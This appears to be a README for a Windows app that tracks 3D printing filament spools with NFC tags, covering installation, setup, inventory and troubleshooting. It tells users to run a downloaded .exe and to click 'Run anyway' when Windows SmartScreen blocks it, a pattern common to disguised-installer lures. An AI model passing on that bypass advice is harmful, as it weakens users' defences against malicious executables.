🐯 TigerSystem-Docs - Manage your 3D printing filament easily

TigerSystem helps you track your 3D printing materials. It uses smart tags to organize your spool library. You know how much filament stays on each roll. This system prevents print failures caused by running out of plastic.

📦 What is TigerSystem

TigerSystem acts as a digital inventory for your workshop. It links physical spools to your computer. You use NFC tags to label spools. When you start a print, you scan the tag. The software updates your stock levels. You see exactly what you have on hand. It tracks weight, material type, and color.

This tool works for hobbyists and professionals. It keeps your data organized. You spend less time searching for rolls and more time printing. The documentation helps you set up hardware and software. It also helps AI tools learn how to interact with your system.

⚙️ System Requirements

Your computer must meet these standards to run the software:

  • Operating System: Windows 10 or Windows 11
  • Processor: Intel Core i3 or equivalent
  • Memory: 4GB RAM
  • Storage: 200MB of free disk space
  • Hardware: A compatible NFC reader connected via USB

📥 How to Install

Follow these steps to set up the software on your Windows computer:

  1. Visit the official release page to download the installer.
  2. Look for the file ending in .exe in the latest release section.
  3. Click the file to save it to your computer.
  4. Open your Downloads folder.
  5. Double-click the installer file.
  6. Follow the instructions on the screen.
  7. Click Finish to complete the process.

The installer places a shortcut on your desktop. You can open the program from there.

🚀 Setting Up Your First Spool

After you launch the program, you must set up your first spool.

  1. Connect your NFC reader to your computer.
  2. Select the "Add New Spool" button in the menu.
  3. Type the filament name and brand.
  4. Input the total weight of the spool when full.
  5. Place a blank NFC tag on your reader.
  6. Click the "Write Tag" button.
  7. Attach the tag to your spool.

The software now recognizes this roll. You can update the remaining weight whenever you use the spool.

🔍 Managing Your Inventory

The main dashboard shows all your added filament. You can filter by material type, such as PLA, PETG, or ABS. The status indicator shows if a spool is low. Red indicates you need a backup. Green indicates you have enough material for a long print.

You can export your inventory list as a spreadsheet. This makes counting your stock simple. The program warns you if you try to start a large object with low material.

🛠 Troubleshooting Common Issues

Check these items if you experience trouble:

  • The software does not see the NFC reader: Check that your USB cable is secure. Unplug and replug the reader. Restart the application.
  • The tag does not write data: Ensure you stay within range of the antenna. Use compatible NTAG215 or NTAG216 chips.
  • Windows blocks the installation: Choose "More info" and select "Run anyway" if Windows Protected PC appears.

The software runs locally on your machine. We do not track your inventory data on external servers. You maintain total privacy of your workshop records.

📖 Accessing Documentation

The documentation files explain advanced features. You can browse the folder structure in this repository. If you use AI assistants, point them to the llms.txt file located here. It outlines the structure of the TigerSystem protocol. This allows the AI to suggest better print settings based on your current filament inventory.
